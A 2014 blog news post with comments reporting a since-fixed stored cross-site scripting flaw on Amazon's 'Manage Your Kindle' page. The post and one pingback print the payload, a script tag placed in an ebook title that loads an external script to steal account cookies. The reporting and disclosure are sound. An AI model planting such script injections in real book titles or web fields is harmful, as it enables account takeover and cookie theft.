Skip to main content

Your Amazon Account Can be Hacked via a Kindle eBook

5811777890_73cb670487[1]Amazon might not have a security issue at Audible but they do have one on their main website.

Update: And it has been fixed.

A security researcher has reported, and I can confirm, that Amazon has a security hole on the "manage Your Kindle" page – one which is relatively easy to fix.

Thanks to this hole, a hacker can gain access to the Amazon account simply by getting his victims to download an ebook which was itself hacked to include a script in the title:

Once an attacker manages to have an e-book (file, document, …) with a title like

<script src="https://www.example.org/script.js"></script>

added to the victim’s library, the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised.

I’ve tried it, and it does work. I saw something similar to the image which the hacker posted to his blog.

2014-reintrot[1]

As a result I would urge caution against buying or downloading ebooks from untrustworthy sources –  for the near future, at least. I expect Amazon will fix this problem shortly – that’s what they did when it was first discovered last fall.

No this is not a new story, though it is just coming to light. The German ebook blog AlleseBook.de broke the story earlier today when they reported on the hacker who discovered this issue – and more importantly, provided an ebook which could prove the hack worked.

Benjamin Daniel Mussler writes that he discovered this security issue last October. He notified Amazon in November, and they fixed it 4 days later. That is great, but then then Amazon reintroduced the security hole earlier this year when they launched the new version of the "Manage Your Kindle" page.

As of the time I wrote this post, Mussler’s hack still worked.  There’s even an ebook which you can use to test the hack yourself, if you like. I would recommend against it, but it is up to you.

On a related note, if you’re worried about being hacked, there is a simple rule you can follow to keep yourself safe.

I have a rule against downloading apps from questionable websites, one which I have long since applied to Epub ebooks (because they can contain Javascript)  and PDFs (because they can hold entire apps). Now it would seem that rule needs to be expanded to include Kindle ebooks as well.

image by Pitel

Similar Articles


Comments


Votre compte Amazon peut être cracké au travers d’un eBook | Quoi lire ? September 15, 2014 um 2:04 pm

[…] Article original sur The Digital Reader  […]


R September 15, 2014 um 7:48 pm

To prevent losing personal info because of hacking, I don’t provide any real info to Amazon (except my credit card no.). I only enter my credit card no. when I want to buy a book, (which I seldom do so). After buying it, I delete the no. It is just always dangerous to save any personal info online.

Skeptical September 21, 2014 um 1:27 pm

" I don’t provide any real info to Amazon (except my credit card no.)" I applaud your caution, but you should be a bit more realistic about it… For one, you had to give also your name and your billing address, or othewise your CC wouldn’t have gone through. But more importantly, note that even in this very limited case, there is no report that credit card numbers were leaked: this should not be a surprise, because you can’t even seen your *own* credit card numbers on Amazon.com (go take a look). So if someone "takes over your account", they *still* can’t see what your credit card numbers are. They also cannot change the shipping address that your account sends to, because this requires retyping your credit card number… which they don’t have. Likewise, they do not gain access to your password (this, too, is not shown to you on amazon.com).

Do not confuse a very limited exploit – recall this required you to download an ebook to your Kindle that has ".js" in it, which is kind of like saying that email is very dangerous if you click on attachments willy-nilly – with the kind of massive data breach that Home Depot and others have had.


dn September 16, 2014 um 3:10 am

Have always had a concern about the lack of security/protection on the Kindle. So with my Kindle+keyboard model, practice has been to download to computer and thence by USB cable to the device.


Authors Target Directors in Amazon-Hachette Dispute | Digital Book World September 16, 2014 um 8:17 am

[…] Ebook as Hacker Tool (The Digital Reader) Hackers have found a way to use ebooks to hack Amazon accounts. It’s an easy-to-fix loophole in Kindle security but scary nonetheless. […]


Rogue E-Books Could Pose Threat to Amazon Accounts | Malwarebytes Unpacked September 16, 2014 um 9:31 am

[…] a writeup by someone demonstrating the researcher’s proof of concept test on themselves, passing with […]


Hackers make the case for trusting Amazon’s and Apple’s “walled gardens” | PandoDaily September 16, 2014 um 10:00 am

[…] was purchased instead of pirated. That’s where the problems like attackers getting access to your Amazon account — which bears your address, and credit card information — come […]


Kindle security flaw can be exploited by hidden codes in e-books | Sprestige.com September 16, 2014 um 11:19 am

[…] Via: The Digital Reader […]


Leer un libro en tu Kindle puede hackear tu cuenta de Amazon | Francisco Unica September 16, 2014 um 1:26 pm

[…] información | The Digital Reader | B.FL7.DE En Genbeta | Algunos conceptos básicos de seguridad informática que deberías […]


Researchers Create A Kindle eBook That Can Hack Your Amazon Account | TechCrunch September 16, 2014 um 3:42 pm

[…] via TheDigitalReader […]


McGroarty September 16, 2014 um 4:00 pm

This is potentially made worse by the fact that most of the cookies on Amazon’s site are not flagged Http-only. If a cookie is not flagged Http-only, it can be read by scripts. I see two different session tokens on my account, one of which is protected and one of which is not.


A Kindle E-Book Flaw Lets Hackers Access Your Amazon Account September 16, 2014 um 5:36 pm

[…] Read the full story at The Digital Reader. […]


Your Amazon Account Can Be Hacked Via A Malicious Kindle Ebook | Gizmodo Australia September 16, 2014 um 9:16 pm

[…] According to The Digital Reader, a hacker can gain access to your Amazon account by simply getting you to download and ebook file, which itself was hacked to include a script like <script src=”https://www.example.org/script.js“></script> in the title. […]


Yahoo, Kindle, Music, Mathematica, More: Evening Buzz, September 17th, 2014 | ResearchBuzz September 17, 2014 um 6:52 pm

[…] your Kindle is vulnerable to hacking by dodgy ebooks. And by “hacking,” I mean, “Your account gets stolen.” Amazon, tell me […]


Tom Semple September 19, 2014 um 4:30 pm

Apparently Amazon has patched this up. I wonder if anyone’s tried a similar hack with Google Play Books. One is able to upload ePub files, and even read them in a browser, which might present a big surface area to attack. Don’t remember if Google’s ePub3 support includes JavaScript support.


Your Amazon Account Can Be Hacked Via a Malicious Kindle Ebook | Rob's Personal Aggregator September 20, 2014 um 11:37 pm

[…] Kindle ebooks from dubious sources aka anywhere other than Amazon, watch out. A security researcher has discovered a security hole in the “Manage Your Kindle” page on Amazon’s website that outs […]


Un hacker podría acceder a la cuenta de Amazon a través de un e-book pirateado September 24, 2014 um 3:32 am

[…] acuerdo con ‘The Digital Reader?, un hacker puede tener acceso a la cuenta de Amazon simplemente si se descarga un archivo de […]


Tuesday 16th of September | September 24, 2014 um 9:47 am

[…] Full Story at The Digital Reader […]


Adobe is Spying on Users, Collecting Data on Their eBook Libraries – The Digital Reader October 6, 2014 um 6:04 pm

[…] this happen, and I can also tell you that Benjamin Daniel Mussler, the security researcher who found the security hole on Amazon.com, has also tested this at my request and saw it with his own […]


WTFery – Adobe collecting user data via Digital Editions, malicious ebook code, & more. | TymberDalton.com October 7, 2014 um 10:37 am

[…] in that article he also references an Amazon vulnerability, that was closed, opened again when Amazon made a site update, and then subsequently closed again, […]


The End is Near (and we deserve it) . . . City Pays Alcoholics with Beer « Bayard & Holmes October 10, 2014 um 3:05 pm

[…] Your Amazon Account Can Be Hacked Via a Kindle eBook, via author and heckuva guy Nigel Blackwell. […]


Cybercrime: The Net Was Not Built For Privacy | anna johnson-hill October 19, 2014 um 7:23 am

[…] ‘walled garden’ (Zittrain 2008). In reality, hackers are able to surpass these boundaries. A flaw was found in Amazon’s walled garden through the ‘Manage Your Kindle’ page which enables the hacker to […]


Amazon-Sicherheitslücke: Manipulierte E-Books als Hintertür › ifun.de December 8, 2015 um 11:47 am

[…] (via Digital Reader) […]


A Look at Amazon: Timeline and Indie Author News March 13, 2017 um 1:06 pm

[…] “Your Amazon Account Can be Hacked via a Kindle eBook” on The Digital Reader […]


Write a Comment